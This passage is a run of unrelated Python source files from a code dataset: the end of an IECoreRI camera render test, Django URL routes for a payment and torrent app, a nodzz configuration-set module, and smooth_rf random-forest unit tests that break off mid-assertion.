			r.camera( "iCanSeeSomething", {} )
		with IECore.WorldBlock( r ) :
			IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -0.1 ), IECore.V2f( 0.1 ) ) ).render( r )
		# check that something appears in the output image
		i = IECore.Reader.create( "test/IECoreRI/output/testCamera.tif" ).read()
		e = IECore.PrimitiveEvaluator.create( i )
		result = e.createResult()
		a = e.A()
		e.pointAtUV( IECore.V2f( 0.5, 0.5 ), result )
		self.assertEqual( result.floatPrimVar( a ), 1 )

	def testMotionBlurCameraRender( self ) :
		# A camera translating during the shutter interval should smear
		# the plane: visible, but with partial alpha coverage.
		r = IECoreRI.Renderer( "" )
		r.display( "test/IECoreRI/output/testCamera.tif", "tiff", "rgba", {} )
		with IECore.TransformBlock( r ) :
			with IECore.MotionBlock( r, [ 0, 1 ] ) :
				r.concatTransform( IECore.M44f.createTranslated( IECore.V3f( -0.2, 0, 1 ) ) )
				r.concatTransform( IECore.M44f.createTranslated( IECore.V3f( 0.2, 0, 1 ) ) )
			r.camera( "main", { "shutter" : IECore.V2f( 0, 1 ) } )
		with IECore.WorldBlock( r ) :
			IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -0.1 ), IECore.V2f( 0.1 ) ) ).render( r )
		i = IECore.Reader.create( "test/IECoreRI/output/testCamera.tif" ).read()
		e = IECore.PrimitiveEvaluator.create( i )
		result = e.createResult()
		e.pointAtUV( IECore.V2f( 0.5, 0.5 ), result )
		self.assertTrue( result.floatPrimVar( e.A() ) > 0 ) # something should be there
		self.assertTrue( result.floatPrimVar( e.A() ) < 1 ) # but it should be blurry

	def testMotionBlurCameraRib( self ) :
		# A motion-blocked camera transform must emit MotionBegin in the RIB.
		r = IECoreRI.Renderer( "test/IECoreRI/output/testCamera.rib" )
		with IECore.TransformBlock( r ) :
			with IECore.MotionBlock( r, [ 0, 1 ] ) :
				r.concatTransform( IECore.M44f.createTranslated( IECore.V3f( -0.2, 0, 1 ) ) )
				r.concatTransform( IECore.M44f.createTranslated( IECore.V3f( 0.2, 0, 1 ) ) )
			r.camera( "main", { "shutter" : IECore.V2f( 0, 1 ) } )
		r.worldBegin()
		r.worldEnd()
		l = "".join( file( "test/IECoreRI/output/testCamera.rib" ).readlines() )
		self.assert_( "MotionBegin [ 0 1 ]" in l )
if __name__ == "__main__":
	unittest.main()
| StarcoderdataPython |
1614350 | from django.urls import path
from .views import (GenPubAddrView, TorrentFileView, BypassPaymentReceivedView, PaymentReceivedView, Pdp2ActivationStatusView, TorrentFileInfoView,
PaymentView, PubAddrsListView, SendPdp2Data, ChangePubKey, WalletNotificationView,
BlockNotificationView, TxnsView, TorrentFileFromTxid, TorrentUuidFromTxid)
# URL routing for the pdp2 app.
# NOTE(review): Django resolves these in order; the overlapping
# 'pdp2-activation-status/...' patterns below rely on that ordering.
urlpatterns = [
    # Generate public key address
    path('new-payment-address/',
         GenPubAddrView.as_view()),
    # Get all payment addresses
    path('payment-addresses/',
         PubAddrsListView.as_view()
         ),
    # download the torrent
    path('get-torrent/',
         TorrentFileView.as_view()),
    path('get-torrent/<str:torrent_uuid>/',
         TorrentFileView.as_view()),
    # get the information about the torrent
    path('get-torrent-info/',
         TorrentFileInfoView.as_view()),
    # NOTE(review): this route converts torrent_uuid with <uuid:...> while
    # 'get-torrent/' above uses <str:...> for the same identifier — confirm
    # which converter is intended.
    path('get-torrent-info/<uuid:torrent_uuid>/',
         TorrentFileInfoView.as_view()),
    # Torrent lookups keyed by a transaction id
    path('get-torrent-via-txid/<str:txid>/',
         TorrentFileFromTxid.as_view()),
    path('get-torrent-info-via-txid/<str:txid>/',
         TorrentUuidFromTxid.as_view()),
    # Payment lifecycle endpoints
    path('payment-received/',
         PaymentReceivedView.as_view()),
    path('bypass-payment-received/',
         BypassPaymentReceivedView.as_view()),
    path('payment/', PaymentView.as_view()),
    path('get-txns/', TxnsView.as_view()),
    # Status of pdp2 profile
    path('pdp2-activation-status/',
         Pdp2ActivationStatusView.as_view()),
    # Allows the user to change the status of their pdp2 profile
    path('pdp2-activation-status/<str:requested_change>/',
         Pdp2ActivationStatusView.as_view()),
    # Allows a staff member to change the status of a user's pdp2 profile
    # TODO should the pub_key_addr be a uuid???
    path('pdp2-activation-status/<str:requested_change>/<uuid:pub_key_addr>/',
         Pdp2ActivationStatusView.as_view()),
    # Sends Pdp2 profile data to a pub_key address
    path('send/', SendPdp2Data.as_view()),
    # Change the public key that the data is encrypted with
    path('change-store-pub-key/', ChangePubKey.as_view()),
    # presumably callbacks posted by the wallet / node software — verify
    # against the sender's configuration
    path('wallet-notification/', WalletNotificationView.as_view()),
    path('block-notification/', BlockNotificationView.as_view())
]
| StarcoderdataPython |
3386737 | <reponame>duskforge/nodzz
"""Configuration management tools.
While ``nodzz`` have the instruments to implement, manage and configure any
behavior tree via pure Python API, this is of course not the most convenient
way to manage behavior trees based projects. ``nodzz`` provides config based
behavior tree management tools which allow completely separate tree graph
design and nodes configuring from each particular node Python implementation.
Here are the core concepts of ``nodzz`` configuration:
Component.
Component is a ``nodzz`` project atomic building block (like node
or some connector, for example).
In the ``nodzz`` configuration tools component is represented by unique name
which identifies it among all other components and its config. From here on,
the ter "component name" and the term "config name" will mean the same.
Component config is a JSON-serializable mapping data structure which can
exist both in the form of ``JSONDict`` (JSON-serializable dict) and in the
form of ``pydantic`` based ``ConfigModelBase`` config which in turn can be
one-to-one converted from or to the ``JSONDict`` representation. Please refer
``ConfigModelBase`` class documentation for more info.
Each component config must have one (and only one) of two fields initialised:
``class_name`` or ``component_name``.
* ``class_name`` is a full import path to the python class which implements
the component and which is initialized with the config. Import path should
should locate component class in current Python environment and has format
like ``nodzz.nodes.controllers.SequenceNode``. If ``class_name`` is initialised,
component config should provide all necessary parameters for the component
correct work.
* ``component_name`` is a reference to the name of some other ``nodzz`` component
(referenced component) in the configuration namespace. In this case referenced
config will be merged to the initial config: all uninitialized fields in the
initial component config will be automatically filled by corresponding values
from the referenced component config. This process is called "config resolution".
Also the component being referenced can itself have a reference to another
component. In such case config resolution process covers all configs chain.
This feature implements some kind of inheritance among the components configs
and encourages components reuse.
Config set.
Config set as a logical entity is a set (surprise!) of component configs that
exist in the same namespace. This allows to identify and access all component
configs by their names. Config set implemented in the config set entity.
"""
# TODO: Some of the docstrings parts should be moved to docs.
# TODO: Implement config dirs loading.
from pathlib import Path
from typing import Optional, List, Dict, Any
from pydantic import BaseModel
from nodzz.basic_types import JSONDict
from nodzz.utils import load_file
class ConfigSet:
    """Component configs management entity.

    ``ConfigSet`` is a container for component configs, loaded from external sources
    like files or databases. It provides instruments for configs access, management
    and validation. ``ConfigSet`` serves as a library of component configs. All configs
    required for any behavior initialisation tree should be contained in one instance
    of ``ConfigSet``.
    """
    def __init__(self) -> None:
        # Maps config name -> {'config': <JSONDict>, 'source': <str>}.
        # 'source' is kept only so error messages can say where a config
        # came from.
        self._meta_configs = {}

    def add_config(self, name: str, config: JSONDict, source: str = 'undefined', update: bool = False) -> None:
        """Adds component config to the config set.

        Adds component config and its metadata to the config set, validates and
        optionally resolves config.

        Args:
            name: Config name.
            config: Component config in JSON-serializable dict format.
            source: Config source ID, used for config source identification in case
                of config management problems.
            update: Boolean flag controlling the behavior when config with already
                existing name is being added. If value is ``True``, existing config will
                be replaced by the new one. If value is ``False``, exception will be raised.
                Default value is ``False``.
        """
        class_name = config.get('class_name')
        ref_name = config.get('component_name')

        # Exactly one of 'class_name' / 'component_name' must be set — see
        # the module docstring for the component config contract.
        if class_name and ref_name:
            raise ValueError(f'Both class_name and component_name are defined in config: {name}(source: {source})')
        elif not class_name and not ref_name:
            raise ValueError(f'Both class_name and component_name are not defined in config: {name} (source: {source})')

        if name in self._meta_configs and not update:
            raise ValueError(f'Trying to add config with already existing name: {name}, '
                             f'new config source: {source}, '
                             f'existing config source: {self._meta_configs[name]["source"]}')

        # TODO: Now is assigning used only for debug mode. Remove when name/module configuration will be implemented.
        config['name'] = name

        self._meta_configs[name] = {
            'config': config,
            'source': source
        }

    def get_config(self, name: str) -> Optional[JSONDict]:
        """Returns config from the config set by its name.

        Args:
            name: Config name.

        Returns:
            JSONDict component config if config with given name exists in
            config set, else ``None``.
        """
        meta_config = self._meta_configs.get(name)
        result = meta_config['config'] if meta_config else None

        return result

    def del_config(self, name: str) -> None:
        """Deletes config from the config set by its name.

        Deleting a name that is not present is a no-op.

        Args:
            name: Config name.
        """
        self._meta_configs.pop(name, None)

    def _resolve_config(self, name: str, config: JSONDict, source: str, chain: Optional[List[str]] = None) -> Dict[str, JSONDict]:
        """Resolves component config.

        Recursively resolves all configs in reference chain of given config (including
        given config itself). References are looked among already loaded to the config
        set configs.

        Args:
            name: Config name.
            config: Component config in JSON-serializable dict format.
            source: Config source ID, used for config source identification in case
                of config management problems.
            chain: List which accumulates non-resolved config names in the method
                recursive calls cycle. Used for the cyclic references detection in
                the component configs.

        Returns:
            Dict containing all resolved configs from the reference chain of given
            config. Keys are config names and values are corresponding configs. Empty
            dict is returned when no config was resolved.
        """
        result = {}
        ref_name = config.get('component_name')

        if ref_name:
            ref_meta_config = self._meta_configs.get(ref_name)

            if ref_meta_config is None:
                raise ValueError(f'Component {name} (source: {source}) refers to the absent component {ref_name}')

            chain = chain or []

            # A reference back to a name already on the resolution path means
            # the configs form a cycle: build a readable report and fail.
            if ref_name in chain:
                error_message = 'Cyclic reference among component configs: '
                for _name in chain:
                    _ref_name = self._meta_configs[_name]['config']['component_name']
                    _source = self._meta_configs[_name]['source']
                    info_str = f'\n\tname: {_name}, refers to: {_ref_name}, source: {_source}'
                    # Extra blank line marks where the cycle begins.
                    info_str = f'\n{info_str}' if _name == ref_name else info_str
                    error_message = f'{error_message}{info_str}'

                info_str = f'\n\tname: {name}, refers to: {ref_name}, source: {source}'
                error_message = f'{error_message}{info_str}'

                raise ValueError(f'Cyclic reference among components:\n{error_message}')

            ref_config = ref_meta_config['config']
            ref_ref_name = ref_config.get('component_name')

            # The referenced config is itself unresolved: recurse down the
            # chain first, then merge against its fully resolved form.
            if ref_ref_name:
                chain.append(name)
                ref_source = ref_meta_config['source']
                result = self._resolve_config(ref_name, ref_config, ref_source, chain)
                ref_config = result[ref_name]

            # Referenced values act as defaults; the initial config's own
            # fields win on conflict.
            resolved_config = {k: v for k, v in ref_config.items()}
            resolved_config.update(**config)
            resolved_config.pop('component_name')

            result[name] = resolved_config

        return result

    def resolve_configs(self) -> None:
        """Prepares all config set configs for components initialisation.

        "Flattens" config set structure: resolves all references between
        configs by setting field values which are absent in config with
        corresponding field values from referenced config.
        """
        for name, meta_config in self._meta_configs.items():
            config = meta_config['config']
            source = meta_config['source']
            resolved_configs = self._resolve_config(name=name, config=config, source=source)

            # Store every config resolved along the chain, not just `name`.
            for config_name, resolved_config in resolved_configs.items():
                self._meta_configs[config_name]['config'] = resolved_config
class _ConfigFileModel(BaseModel):
    """Config file validation model.

    The root of a config file must be a mapping of config name to component
    config (itself an arbitrary JSON-serializable mapping); ``parse_obj``
    raises a validation error otherwise.
    """
    __root__: Dict[str, Dict[str, Any]]
def load_config_file(file_path: Path) -> ConfigSet:
    """Loads component configs from single JSON/YAML file and initialises ``ConfigSet`` entity.

    File should contain dict as a root element where keys are config names and
    values are configs.

    Args:
        file_path: ``pathlib`` object with configuration file path.

    Returns:
        ``ConfigSet`` instance with resolved configs loaded from file.
    """
    raw_configs = load_file(file_path)

    # Raises a validation error if the file root is not a mapping of
    # name -> config; the parsed model itself is not needed afterwards.
    _ConfigFileModel.parse_obj(raw_configs)

    config_set = ConfigSet()
    source_id = str(file_path)

    for config_name, component_config in raw_configs.items():
        config_set.add_config(name=config_name, config=component_config, source=source_id)

    config_set.resolve_configs()

    return config_set
| StarcoderdataPython |
1676571 | <filename>smooth_rf/tests/test_pytorch_prep.py
import numpy as np
import pandas as pd
import scipy.sparse
import sparse
import sklearn
from sklearn.ensemble import RandomForestRegressor
from collections import Counter
import sys, os
import smooth_rf
def test_create_Gamma_eta_tree_more_regression():
    """
    test for create_Gamma_eta_tree_more, regression tree - standard depth only

    Both static and random tests (random tests are more relative to structure
    than exact answers)
    """
    # random - structure output check
    # data creation
    n = 200
    min_size_leaf = 1

    X = np.random.uniform(size = (n, 510), low = -1,high = 1)
    y = 10 * np.sin(np.pi * X[:,0]*X[:,1]) + 20 * ( X[:,2] - .5)**2 +\
        10 * X[:,3] + 5 * X[:,4] + np.random.normal(size = n)

    rf_class = sklearn.ensemble.RandomForestRegressor(n_estimators = 2,
                                                      min_samples_leaf = min_size_leaf)
    random_forest = rf_class.fit(X = X,
                                 y = y.ravel())

    tree = random_forest.estimators_[0]

    max_depth_range = np.max(smooth_rf.depth_per_node(tree)) + 1

    G, n, ln, ld, li = smooth_rf.create_Gamma_eta_tree_more(tree)

    assert G.shape == (np.sum(tree.tree_.children_left == -1),
                       max_depth_range), \
        "Gamma returned does not have the correct shape"

    assert n.shape == G.shape, \
        "eta returned does not have the correct shape"

    assert np.all(n >= 0), \
        "eta returned has negative values"

    assert np.all(n[:,0] ==
        tree.tree_.weighted_n_node_samples[tree.tree_.children_left == -1]),\
        "eta structure doesn't match up with number of observes per leaf"

    # new tests
    assert ln.shape[0] == G.shape[0] and ld.shape[0] == G.shape[0] and \
        li.shape[0] == G.shape[0], \
        "leaf based outputs should have same number of leaves and Gamma"

    assert np.all(np.ceil(ln) == ln) and np.all(ln > 0), \
        "leaf counts should be strictly positive and integers"

    assert np.all(ln ==
        tree.tree_.weighted_n_node_samples[tree.tree_.children_left == -1]), \
        "number of obs in each leaf not matching tree structure"

    assert np.all(np.ceil(ld) == ld) and np.all(ld >= 0), \
        "leaf depth should be positive and integers"

    assert np.all(li >= - 1e-10), \
        "leaf impurity (mse) should be non-negative"

    # static check
    # tree structure:
    # ~upper: left, lower: right~
    #             num obs   depth
    #   |--1      10        1
    # -0-|        34        0
    #   |   |--3  9         2
    #   |-2-|     24        1
    #       |--5  8         3
    #     |-4-|   15        2
    #       |--6  7         3

    # eta
    # (1) 10 | 24 | 0  | 0
    # (3) 9  | 15 | 10 | 0
    # (5) 8  | 7  | 9  | 10
    # (6) 7  | 8  | 9  | 10

    # Gamma
    # (1) 10         | 18+24+28 = 70 | 0  | 0
    # (3) 9 * 2 = 18 | 24+28 = 52    | 10 | 0
    # (5) 8 * 3 = 24 | 28            | 18 | 10
    # (6) 7 * 4 = 28 | 24            | 18 | 10

    # WHEN parent == True
    # eta
    # (1) 10 | 10+24 = 34 | 34+0 = 34  | 34+0 = 34
    # (3) 9  | 15+9 = 24  | 24+10 = 34 | 34+0 = 34
    # (5) 8  | 8+7 = 15   | 15+9 = 24  | 24+10 = 34
    # (6) 7  | 8+7 = 15   | 15+9 = 24  | 24+10 = 34

    # Gamma
    # (1) 10         | 10+(18+24+28) = 80 | 80+0 = 80  | 80+0 = 80
    # (3) 9 * 2 = 18 | 18+(24+28) = 70    | 70+10 = 80 | 80+0 = 80
    # (5) 8 * 3 = 24 | 24+28 = 52         | 52+18 = 70 | 70+10 = 80
    # (6) 7 * 4 = 28 | 28+24 = 52         | 52+18 = 70 | 70+10 = 80

    class inner_fake_tree():
        def __init__(self, nn, cl, cr, v):
            self.weighted_n_node_samples = nn
            self.children_left = cl
            self.children_right = cr
            self.value = v
            self.impurity = np.zeros(v.shape[0]) # this isn't a good test

    class fake_tree():
        def __init__(self, nn, cl, cr, v):
            self.tree_ = inner_fake_tree(nn, cl, cr, v)
            # public import path (the private sklearn.tree.tree module that
            # exposed the same class was removed from scikit-learn)
            self.__class__ = sklearn.tree.DecisionTreeRegressor

    # np.int was a deprecated alias of the builtin int (removed in NumPy 1.24)
    weighted_n_node_samples = np.array([34,10,24,9,15,8,7], dtype = int)
    children_left = np.array([2,-1,4,-1,6,-1,-1], dtype = int)
    children_right = np.array([1,-1,3,-1,5,-1,-1], dtype = int)
    value = np.array([-99, 1, -99, 2, -99, 3, 4]).reshape((-1,1,1))

    test = fake_tree(weighted_n_node_samples,
                     children_left,
                     children_right,
                     value)

    n_leaf = 4

    g_static, n_static, ln_static, ld_static, li_static = \
        smooth_rf.create_Gamma_eta_tree_more(test)

    n_expected = np.array([[10,24,0,0],
                           [9,15,10,0],
                           [8,7,9,10],
                           [7,8,9,10]])
    g_expected = np.array([[10,70,0,0],
                           [18,52,10,0],
                           [24,28,18,10],
                           [28,24,18,10]])
    ln_expected = n_expected[:,0]
    ld_expected = np.array([1,2,3,3])

    assert np.all(g_static == g_expected), \
        "static test's Gamma failed to reproduce correct solutions"
    assert np.all(n_static == n_expected), \
        "static test's eta failed to reproduce correct solutions"
    assert np.all(ln_static == ln_expected), \
        "static test's leaf count failed to reproduce correct solutions"
    assert np.all(ld_static == ld_expected), \
        "static test's leaf depth failed to reproduce correct solutions"

    # WHEN parent == true
    g_static, n_static, ln_static, ld_static, li_static = \
        smooth_rf.create_Gamma_eta_tree_more(test, parents_all=True)

    n_expected = np.array([[10,34,34,34],
                           [9,24,34,34],
                           [8,15,24,34],
                           [7,15,24,34]])
    g_expected = np.array([[10,80,80,80],
                           [18,70,80,80],
                           [24,52,70,80],
                           [28,52,70,80]])
    ln_expected = n_expected[:,0]
    ld_expected = np.array([1,2,3,3])

    assert np.all(g_static == g_expected), \
        "static test's Gamma failed to reproduce correct solutions, " +\
        "parent = True"
    assert np.all(n_static == n_expected), \
        "static test's eta failed to reproduce correct solutions, " +\
        "parent = True"
    assert np.all(ln_static == ln_expected), \
        "static test's leaf count failed to reproduce correct solutions, " +\
        "parent = True"
    assert np.all(ld_static == ld_expected), \
        "static test's leaf depth failed to reproduce correct solutions, " +\
        "parent = True"
def test_create_Gamma_eta_tree_more_classification():
    """
    test for create_Gamma_eta_tree_more, class - standard depth only

    Both static and random tests (random tests are more relative to structure
    than exact answers)
    """
    # random - structure output check
    # data creation
    n = 200
    min_size_leaf = 1

    X = np.random.uniform(size = (n, 510), low = -1,high = 1)
    y = 10 * np.sin(np.pi * X[:,0]*X[:,1]) + 20 * ( X[:,2] - .5)**2 +\
        10 * X[:,3] + 5 * X[:,4] + np.random.normal(size = n)

    # np.int was a deprecated alias of the builtin int (removed in NumPy 1.24)
    y_cat = np.array(
        pd.cut(y, bins = 5, labels = np.arange(5, dtype = int)),
        dtype = int)
    y = y_cat

    num_classes = len(Counter(y_cat).keys())

    rf_class = sklearn.ensemble.RandomForestClassifier(n_estimators = 2,
                                                       min_samples_leaf = min_size_leaf)
    random_forest = rf_class.fit(X = X,
                                 y = y.ravel())

    tree = random_forest.estimators_[0]

    max_depth_range = np.max(smooth_rf.depth_per_node(tree)) + 1

    G, n, ln, ld, li = smooth_rf.create_Gamma_eta_tree_more(tree)

    assert G.shape == (num_classes,
                       np.sum(tree.tree_.children_left == -1),
                       max_depth_range), \
        "Gamma returned does not have the correct shape"

    assert n.shape == G.shape[1:3], \
        "eta returned does not have the correct shape"

    assert np.all(n >= 0), \
        "eta returned has negative values"

    assert np.all(n[:,0] ==
        tree.tree_.weighted_n_node_samples[tree.tree_.children_left == -1]),\
        "eta structure doesn't match up with number of observes per leaf"

    # new tests
    assert ln.shape[0] == G.shape[1] and ld.shape[0] == G.shape[1] and \
        li.shape[0] == G.shape[1], \
        "leaf based outputs should have same number of leaves and Gamma"

    assert np.all(np.ceil(ln) == ln) and np.all(ln > 0), \
        "leaf counts should be strictly positive and integers"

    assert np.all(ln ==
        tree.tree_.weighted_n_node_samples[tree.tree_.children_left == -1]), \
        "number of obs in each leaf not matching tree structure"

    assert np.all(np.ceil(ld) == ld) and np.all(ld >= 0), \
        "leaf depth should be positive and integers"

    # static check
    # tree structure:
    # ~upper: left, lower: right~
    #             num obs   class 1   class 2   depth
    #   |--1      10        5         5         1
    # -0-|        34        21        13        0
    #   |   |--3  9         9         0         2
    #   |-2-|     24        16        8         1
    #       |--5  8         7         1         3
    #     |-4-|   15        7         8         2
    #       |--6  7         0         7         3

    # eta
    # (1) 10 | 24 | 0  | 0
    # (3) 9  | 15 | 10 | 0
    # (5) 8  | 7  | 9  | 10
    # (6) 7  | 8  | 9  | 10

    # Gamma (class 1)
    # (1) 5 | 9+7 = 16| 0 | 0
    # (3) 9 | 7       | 5 | 0
    # (5) 7 | 0       | 9 | 5
    # (6) 0 | 7       | 9 | 5

    # Gamma (class 2)
    # (1) 5 | 1+7 = 8| 0 | 0
    # (3) 0 | 8      | 5 | 0
    # (5) 1 | 7      | 0 | 5
    # (6) 7 | 1      | 0 | 5

    def gini(vec):
        p = vec / vec.sum()
        return p.T @ (1-p)

    class inner_fake_tree():
        def __init__(self, nn, cl, cr, v):
            self.weighted_n_node_samples = nn
            self.children_left = cl
            self.children_right = cr
            self.value = v
            self.impurity = np.array([gini(v[i,:,:].ravel()) for i in range(v.shape[0])])

    class fake_tree():
        def __init__(self, nn, cl, cr, v):
            self.tree_ = inner_fake_tree(nn, cl, cr, v)
            # public import path (the private sklearn.tree.tree module that
            # exposed the same class was removed from scikit-learn)
            self.__class__ = sklearn.tree.DecisionTreeClassifier

    # np.int / np.float were deprecated aliases of the builtins (removed in
    # NumPy 1.24)
    weighted_n_node_samples = np.array([34,10,24,9,15,8,7], dtype = int)
    children_left = np.array([2,-1,4,-1,6,-1,-1], dtype = int)
    children_right = np.array([1,-1,3,-1,5,-1,-1], dtype = int)
    value = np.array([[21, 13],
                      [5, 5],
                      [16, 8],
                      [9, 0],
                      [7, 8],
                      [7, 1],
                      [0, 7]], dtype = float).reshape((-1,1,2))

    test = fake_tree(weighted_n_node_samples,
                     children_left,
                     children_right,
                     value)

    n_leaf = 4

    g_static, n_static, ln_static, ld_static, li_static = \
        smooth_rf.create_Gamma_eta_tree_more(test)

    n_expected = np.array([[10,24,0,0],
                           [9,15,10,0],
                           [8,7,9,10],
                           [7,8,9,10]])
    g_expected = np.array([[[5,16,0,0],
                            [9,7,5,0],
                            [7,0,9,5],
                            [0,7,9,5]],
                           [[5,8,0,0],
                            [0,8,5,0],
                            [1,7,0,5],
                            [7,1,0,5]]])
    ln_expected = np.array([10,9,8,7])
    ld_expected = np.array([1,2,3,3])
    li_expected = np.array([gini(value[i,:,:].ravel()) for i in range(value.shape[0])])[np.array([1,3,5,6])]

    assert np.all(g_static == g_expected), \
        "static test's Gamma failed to reproduce correct solutions"
    assert np.all(n_static == n_expected), \
        "static test's eta failed to reproduce correct solutions"
    assert np.all(ln_static == ln_expected), \
        "static test's leaf count failed to reproduce correct solutions"
    assert np.all(ld_static == ld_expected), \
        "static test's leaf depth failed to reproduce correct solutions"
    assert np.all(li_static == li_expected), \
        "static test's leaf impurity failed to reproduce correct solutions"
def test_create_Gamma_eta_tree_more_per_regression():
    """
    test for create_Gamma_eta_tree_more_per, reg tree - standard depth only

    Both static and random tests (random tests are more relative to structure
    than exact answers)
    """
    # random - structure output check
    # data creation
    n = 200
    min_size_leaf = 1

    X = np.random.uniform(size = (n, 510), low = -1,high = 1)
    y = 10 * np.sin(np.pi * X[:,0]*X[:,1]) + 20 * ( X[:,2] - .5)**2 +\
        10 * X[:,3] + 5 * X[:,4] + np.random.normal(size = n)

    rf_class = sklearn.ensemble.RandomForestRegressor(n_estimators = 2,
                                                      min_samples_leaf = min_size_leaf)
    random_forest = rf_class.fit(X = X,
                                 y = y.ravel())

    tree = random_forest.estimators_[0]

    max_depth_range = np.max(smooth_rf.depth_per_node(tree)) + 1

    G, n, ln, ld, li, fd, fi = smooth_rf.create_Gamma_eta_tree_more_per(tree)

    assert G.shape == (np.sum(tree.tree_.children_left == -1),
                       max_depth_range), \
        "Gamma returned does not have the correct shape"

    assert n.shape == G.shape, \
        "eta returned does not have the correct shape"

    assert np.all(n >= 0), \
        "eta returned has negative values"

    assert np.all(n[:,0] ==
        tree.tree_.weighted_n_node_samples[tree.tree_.children_left == -1]),\
        "eta structure doesn't match up with number of observes per leaf"

    # new tests (ln,ld,li)
    assert ln.shape[0] == G.shape[0] and ld.shape[0] == G.shape[0] and \
        li.shape[0] == G.shape[0], \
        "leaf based outputs should have same number of leaves and Gamma"

    assert np.all(np.ceil(ln) == ln) and np.all(ln > 0), \
        "leaf counts should be strictly positive and integers"

    assert np.all(ln ==
        tree.tree_.weighted_n_node_samples[tree.tree_.children_left == -1]), \
        "number of obs in each leaf not matching tree structure"

    assert np.all(np.ceil(ld) == ld) and np.all(ld >= 0), \
        "leaf depth should be positive and integers"

    assert np.all(li >= - 1e-10), \
        "leaf impurity (mse) should be non-negative"

    # newest tests (fd, fi)
    assert fd.shape == G.shape and fi.shape == G.shape, \
        "shapes of full depth and impurity should make shape of Gamma"

    assert np.all(fd[:,0] == ld) and np.all(np.ceil(fd) == fd) and \
        np.all(fd >= 0), \
        "full depth shape should mirror leaf depth structure"

    assert np.all(fi[:,0] == li) and np.all(fi >= - 1e-10), \
        "full impurity (mse) should mirror leaf impurity structure"

    # for c_idx in range(fi.shape[1] - 1):
    #     assert np.all(fi[:,c_idx] - fi[:,c_idx + 1] <= 1e-10), \
    #         "impurity should be increasing (mse)"

    # static check
    # tree structure:
    # ~upper: left, lower: right~
    #             num obs   depth
    #   |--1      10        1
    # -0-|        34        0
    #   |   |--3  9         2
    #   |-2-|     24        1
    #       |--5  8         3
    #     |-4-|   15        2
    #       |--6  7         3

    # eta
    # (1) 10 | 24 | 0  | 0
    # (3) 9  | 15 | 10 | 0
    # (5) 8  | 7  | 9  | 10
    # (6) 7  | 8  | 9  | 10

    # Gamma
    # (1) 10         | 18+24+28 = 70 | 0  | 0
    # (3) 9 * 2 = 18 | 24+28 = 52    | 10 | 0
    # (5) 8 * 3 = 24 | 28            | 18 | 10
    # (6) 7 * 4 = 28 | 24            | 18 | 10

    class inner_fake_tree():
        def __init__(self, nn, cl, cr, v):
            self.weighted_n_node_samples = nn
            self.children_left = cl
            self.children_right = cr
            self.value = v
            self.impurity = np.zeros(v.shape[0]) # this isn't a good test

    class fake_tree():
        def __init__(self, nn, cl, cr, v):
            self.tree_ = inner_fake_tree(nn, cl, cr, v)
            # public import path (the private sklearn.tree.tree module that
            # exposed the same class was removed from scikit-learn)
            self.__class__ = sklearn.tree.DecisionTreeRegressor

    # np.int was a deprecated alias of the builtin int (removed in NumPy 1.24)
    weighted_n_node_samples = np.array([34,10,24,9,15,8,7], dtype = int)
    children_left = np.array([2,-1,4,-1,6,-1,-1], dtype = int)
    children_right = np.array([1,-1,3,-1,5,-1,-1], dtype = int)
    value = np.array([-99, 1, -99, 2, -99, 3, 4]).reshape((-1,1,1))

    test = fake_tree(weighted_n_node_samples,
                     children_left,
                     children_right,
                     value)

    n_leaf = 4

    g_static, n_static, ln_static, ld_static, li_static, \
        fd_static, fi_static = \
        smooth_rf.create_Gamma_eta_tree_more_per(test)

    n_expected = np.array([[10,24,0,0],
                           [9,15,10,0],
                           [8,7,9,10],
                           [7,8,9,10]])
    g_expected = np.array([[10,70,0,0],
                           [18,52,10,0],
                           [24,28,18,10],
                           [28,24,18,10]])
    ln_expected = n_expected[:,0]
    ld_expected = np.array([1,2,3,3])
    fd_expected = np.array([[1,0,0,0],
                            [2,1,0,0],
                            [3,2,1,0],
                            [3,2,1,0]])

    assert np.all(g_static == g_expected), \
        "static test's Gamma failed to reproduce correct solutions"
    assert np.all(n_static == n_expected), \
        "static test's eta failed to reproduce correct solutions"
    assert np.all(ln_static == ln_expected), \
        "static test's leaf count failed to reproduce correct solutions"
    assert np.all(ld_static == ld_expected), \
        "static test's leaf depth failed to reproduce correct solutions"
    assert np.all(fd_static == fd_expected), \
        "static test's full depth failed to reproduce correct solutions"
def test_create_Gamma_eta_tree_more_per_classification():
    """
    test for create_Gamma_eta_tree_more, class tree - standard depth only

    Both static and random tests (random tests are more relative to structure
    than exact answers)
    """
    # random - structure output check
    # data creation
    n = 200
    min_size_leaf = 1

    X = np.random.uniform(size = (n, 510), low = -1,high = 1)
    y = 10 * np.sin(np.pi * X[:,0]*X[:,1]) + 20 * ( X[:,2] - .5)**2 +\
        10 * X[:,3] + 5 * X[:,4] + np.random.normal(size = n)

    # np.int was a deprecated alias of the builtin int (removed in NumPy 1.24)
    y_cat = np.array(
        pd.cut(y, bins = 5, labels = np.arange(5, dtype = int)),
        dtype = int)
    y = y_cat

    num_classes = len(Counter(y_cat).keys())

    rf_class = sklearn.ensemble.RandomForestClassifier(n_estimators = 2,
                                                       min_samples_leaf = min_size_leaf)
    random_forest = rf_class.fit(X = X,
                                 y = y.ravel())

    tree = random_forest.estimators_[0]

    max_depth_range = np.max(smooth_rf.depth_per_node(tree)) + 1

    G, n, ln, ld, li, fd, fi = smooth_rf.create_Gamma_eta_tree_more_per(tree)

    assert G.shape == (num_classes,
                       np.sum(tree.tree_.children_left == -1),
                       max_depth_range), \
        "Gamma returned does not have the correct shape"

    assert n.shape == G.shape[1:3], \
        "eta returned does not have the correct shape"

    assert np.all(n >= 0), \
        "eta returned has negative values"

    assert np.all(n[:,0] ==
        tree.tree_.weighted_n_node_samples[tree.tree_.children_left == -1]),\
        "eta structure doesn't match up with number of observes per leaf"

    # new tests
    assert ln.shape[0] == G.shape[1] and ld.shape[0] == G.shape[1] and \
        li.shape[0] == G.shape[1], \
        "leaf based outputs should have same number of leaves and Gamma"

    assert np.all(np.ceil(ln) == ln) and np.all(ln > 0), \
        "leaf counts should be strictly positive and integers"

    assert np.all(ln ==
        tree.tree_.weighted_n_node_samples[tree.tree_.children_left == -1]), \
        "number of obs in each leaf not matching tree structure"

    assert np.all(np.ceil(ld) == ld) and np.all(ld >= 0), \
        "leaf depth should be positive and integers"

    # newest tests (fd, fi)
    assert fd.shape == G.shape[1:] and fi.shape == G.shape[1:], \
        "shapes of full depth and impurity should make shape of Gamma"

    assert np.all(fd[:,0] == ld) and np.all(np.ceil(fd) == fd) and \
        np.all(fd >= 0), \
